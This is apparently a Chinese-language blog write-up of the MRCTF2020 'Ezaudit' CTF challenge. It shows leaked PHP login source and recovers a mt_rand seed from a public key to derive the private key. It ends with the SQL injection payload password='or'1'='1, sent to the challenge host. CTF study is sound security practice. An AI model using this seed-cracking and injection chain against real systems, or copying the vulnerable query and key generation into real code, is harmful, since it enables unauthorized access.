刷题笔记:[MRCTF2020]Ezaudit

CTF Web PHP代码审计
Web
发布日期:   2021-08-10
更新日期:   2022-01-28
文章字数:   489
阅读时长:   2 分

前言

关键字:[php_mt_seed]

题解

随手一输,www.zip,得 源码泄漏

源码

<?php
header('Content-type:text/html; charset=utf-8');
error_reporting(0);
if (isset($_POST['login'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];
    $Private_key = $_POST['Private_key'];
    if (($username == '') || ($password == '') || ($Private_key == '')) {
        // 若为空,视为未填写,提示错误,并3秒后返回登录界面
        header('refresh:2; url=login.html');
        echo "用户名、密码、密钥不能为空啦,crispr会让你在2秒后跳转到登录界面的!";
        exit;
    } else if ($Private_key != '*************') {
        header('refresh:2; url=login.html');
        echo "假密钥,咋会让你登录?crispr会让你在2秒后跳转到登录界面的!";
        exit;
    } else {
        if ($Private_key === '************') {
            $getuser = "SELECT flag FROM user WHERE username= 'crispr' AND password = '$password'" . ';';
            $link = mysql_connect("localhost", "root", "root");
            mysql_select_db("test", $link);
            $result = mysql_query($getuser);
            while ($row = mysql_fetch_assoc($result)) {
                echo "<tr><td>" . $row["username"] . "</td><td>" . $row["flag"] . "</td><td>";
            }
        }
    }
}
// genarate public_key
function public_key($length = 16)
{
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ($i = 0; $i < $length; $i++)
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    return $public_key;
}

//genarate private_key
function private_key($length = 12)
{
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ($i = 0; $i < $length; $i++)
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    return $private_key;
}
$Public_key = public_key();
  //$Public_key = KVQP0LdJKRaV3n9D  how to get crispr's private_key???

看后面给了公钥,要算出私钥,而是随机种子没有重置,所以先尝试php随机爆破

跑出来了,验证一下试试

<?php

mt_srand(1775196155);

function public_key($length = 16)
{
    $strings1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $public_key = '';
    for ($i = 0; $i < $length; $i++)
        $public_key .= substr($strings1, mt_rand(0, strlen($strings1) - 1), 1);
    echo $public_key;
}


function private_key($length = 12)
{
    $strings2 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
    $private_key = '';
    for ($i = 0; $i < $length; $i++)
        $private_key .= substr($strings2, mt_rand(0, strlen($strings2) - 1), 1);
    echo $private_key;
}
private_key();

php5.2.17,公钥验证成功

生成下私钥为

XuNhoueCDCGc

php5之后的随机种子每次进行mt_rand都会进行重置,所以需要顺着程序思路,设置好初始随机种子,先生成公钥,再生成私钥。不可直接上来生成私钥。

然后sql注入下,结束

http://7f12c5f3-f664-43fb-9cee-48361320f1d1.node4.buuoj.cn:81/login.php

POST:
Private_key=XuNhoueCDCGc&login=登录&password='or'1'='1&username=123
文章作者: 巡璃
文章链接: https://syunaht.com/p/2269707160.html
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 巡璃 !
CTF Web PHP代码审计
评论
  目录